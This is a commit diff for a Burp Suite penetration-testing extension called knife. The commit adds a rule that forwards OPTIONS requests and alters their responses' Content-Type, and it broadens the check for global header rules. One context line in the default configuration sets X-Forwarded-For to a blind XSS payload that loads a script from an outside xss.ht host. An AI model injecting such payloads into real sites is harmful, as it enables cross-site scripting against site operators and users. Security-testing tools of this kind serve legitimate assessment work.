update

bit4woo · Jan 8, 2024 · d27177d · d27177d
1 parent 2591ad2
commit d27177d
Show file tree

Hide file tree

Showing 5 changed files with 39 additions and 10 deletions.
diff --git a/src/burp/BurpExtender.java b/src/burp/BurpExtender.java
@@ -251,8 +251,7 @@ public void processProxyMessage(boolean messageIsRequest, IInterceptedProxyMessa
 					HeaderManager.checkURLBasedRuleAndTakeAction(rule, messageIsRequest, messageInfo);
 				}
 
-				//remove header
-				if (rule.isGlobalRemoveHeaderHandleActionType()) {
+				if (rule.isGlobalHandleActionType()) {
 					HeaderManager.checkGlobalRuleAndTakeAction(rule, messageIsRequest, messageInfo);
 				}
 			}
@@ -291,7 +290,7 @@ public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequ
 						}
 
 						//remove header
-						if (rule.isGlobalRemoveHeaderHandleActionType()) {
+						if (rule.isGlobalHandleActionType()) {
 							HeaderManager.checkGlobalRuleAndTakeAction(rule, messageIsRequest, messageInfo);
 						}
 					}

diff --git a/src/config/ConfigEntry.java b/src/config/ConfigEntry.java
@@ -19,6 +19,7 @@ public class ConfigEntry {
 	public static final String Action_Add_Or_Replace_Header = "Action_Add_Or_Replace_Header";// scope is controlled by gui
 	public static final String Action_Append_To_header_value = "Action_Append_To_header_value";// scope is controlled by gui
 	public static final String Action_Remove_From_Headers = "Action_Remove_From_Headers"; //scope is for all request
+	public static final String Action_Forward_And_Hide_Options = "Action_Forward_And_Hide_Options"; //scope is for all request
 	private static final String Action_ = "Action_";
 
 	public static final String Action_If_Base_URL_Matches_Add_Or_Replace_Header = "Action_If_Base_URL_Matches_Add_Or_Replace_Header";
@@ -35,6 +36,7 @@ public class ConfigEntry {
 	public static final String Action_Forward_Request_If_Host_Matches = "Action_Forward_Request_If_Host_Matches";
 	public static final String Action_Forward_Request_If_URL_Matches = "Action_Forward_Request_If_URL_Matches";
 	public static final String Action_Forward_Request_If_Keyword_Matches = "Action_Forward_Request_If_Keyword_Matches";
+
 	private static final String Action_Forward_Request = "Action_Forward_Request";
 
 
@@ -191,10 +193,19 @@ public boolean isScopeBasedHeaderHandleActionType() {
 	}
 
 
-	public boolean isGlobalRemoveHeaderHandleActionType() {
+	public boolean isGlobalHandleActionType() {
 		if (type.equals(Action_Remove_From_Headers)) {
 			return true;
 		}
+		if (type.equals(Action_Add_Or_Replace_Header)) {
+			return true;
+		}
+		if (type.equals(Action_Append_To_header_value)) {
+			return true;
+		}
+		if (type.equals(Action_Forward_And_Hide_Options)) {
+			return true;
+		}
 		return false;
 	}
 

diff --git a/src/config/ConfigTableModel.java b/src/config/ConfigTableModel.java
@@ -75,6 +75,7 @@ public ConfigTableModel(){
 		configEntries.add(new ConfigEntry("Last-Modified", "",ConfigEntry.Action_Remove_From_Headers,true,true,Global_Scope_Comment));
 		configEntries.add(new ConfigEntry("If-Modified-Since", "",ConfigEntry.Action_Remove_From_Headers,true,true,Global_Scope_Comment));
 		configEntries.add(new ConfigEntry("If-None-Match", "",ConfigEntry.Action_Remove_From_Headers,true,true,Global_Scope_Comment));
+		configEntries.add(new ConfigEntry("OPTIONS", "",ConfigEntry.Action_Forward_And_Hide_Options,true,true,Global_Scope_Comment));
 
 		configEntries.add(new ConfigEntry("X-Forwarded-For", "'\\\"><sCRiPt/src=//bmw.xss.ht>",ConfigEntry.Action_Add_Or_Replace_Header,true,true,Scope_Comment));
 		//避免IP:port的切分操作，把Payload破坏，所以使用不带分号的简洁Payload

diff --git a/src/manager/DismissedTargetsManager.java b/src/manager/DismissedTargetsManager.java
@@ -44,14 +44,14 @@ public static void putRule(IHttpRequestResponse[] messages,String keyword,String
 
 				if (action.equalsIgnoreCase(ConfigEntry.Action_Drop_Request_If_Host_Matches)
 						|| action.equalsIgnoreCase(ConfigEntry.Action_Forward_Request_If_Host_Matches)) {
-					
+
 					delSameConditionRule(host);
 					GUI.tableModel.addNewConfigEntry(new ConfigEntry(host, "",action,true));
 				}
 
 				if (action.equalsIgnoreCase(ConfigEntry.Action_Drop_Request_If_URL_Matches)
 						|| action.equalsIgnoreCase(ConfigEntry.Action_Forward_Request_If_URL_Matches)) {
-					
+
 					delSameConditionRule(url);
 					GUI.tableModel.addNewConfigEntry(new ConfigEntry(url, "",action,true));
 				}
@@ -61,7 +61,7 @@ public static void putRule(IHttpRequestResponse[] messages,String keyword,String
 		if (keyword != null && !keyword.equals("")) {
 			if (action.equalsIgnoreCase(ConfigEntry.Action_Drop_Request_If_Keyword_Matches)
 					|| action.equalsIgnoreCase(ConfigEntry.Action_Forward_Request_If_Keyword_Matches)) {
-				
+
 				delSameConditionRule(keyword);
 				GUI.tableModel.addNewConfigEntry(new ConfigEntry(keyword, "",action,true));
 			}
@@ -135,6 +135,14 @@ private static MatchResult whichAction(ConfigEntry rule,IHttpRequestResponse mes
 		String host = getHost(message);//域名不应该大小写敏感
 		String url = getUrl(message);//URL中可能包含大写字母比如getUserInfo，URL应该是大小写敏感的。
 
+		if (rule.getType().equals(ConfigEntry.Action_Forward_And_Hide_Options) && rule.isEnable()) {
+			HelperPlus getter = new HelperPlus(BurpExtender.callbacks.getHelpers());
+			String method = getter.getMethod(message);
+			if (method.equals("OPTIONS")) {
+				return new MatchResult(Forward, rule);
+			}
+		}
+
 		if (rule.getType().equalsIgnoreCase(ConfigEntry.Action_Drop_Request_If_Host_Matches)) {
 			if (host.equalsIgnoreCase(rule.getKey())) {
 				return new MatchResult(Drop, rule);

diff --git a/src/manager/HeaderManager.java b/src/manager/HeaderManager.java
@@ -329,19 +329,29 @@ public static IHttpRequestResponse checkScopeBasedRuleAndTakeAction(ConfigEntry
 	public static IHttpRequestResponse checkGlobalRuleAndTakeAction(ConfigEntry rule,boolean messageIsRequest, IHttpRequestResponse messageInfo){
 		//remove header
 		byte[] oldRequest = messageInfo.getRequest();
-		
+
 		String key = rule.getKey();
 		HelperPlus getter = new HelperPlus(BurpExtender.callbacks.getHelpers());
 		if (rule.getType().equals(ConfigEntry.Action_Remove_From_Headers) && rule.isEnable()) {
 			getter.removeHeader(messageIsRequest, messageInfo, key);
 		}
-
+
+		if (rule.getType().equals(ConfigEntry.Action_Forward_And_Hide_Options) && rule.isEnable()) {
+			if (!messageIsRequest) {
+				String method = getter.getMethod(messageInfo);
+				if (method.equals("OPTIONS")) {
+					getter.addOrUpdateHeader(messageIsRequest, messageInfo, "Content-Type", "application/octet-stream");
+					messageInfo.setComment("auto changed by knife");
+				}
+			}
+		}
+
 		byte[] newRequest = messageInfo.getRequest();
 		if (!Arrays.equals(newRequest,oldRequest)){
 			//https://stackoverflow.com/questions/9499560/how-to-compare-the-java-byte-array
 			messageInfo.setComment("auto changed by knife");
 		}
-		
+
 		return messageInfo;
 	}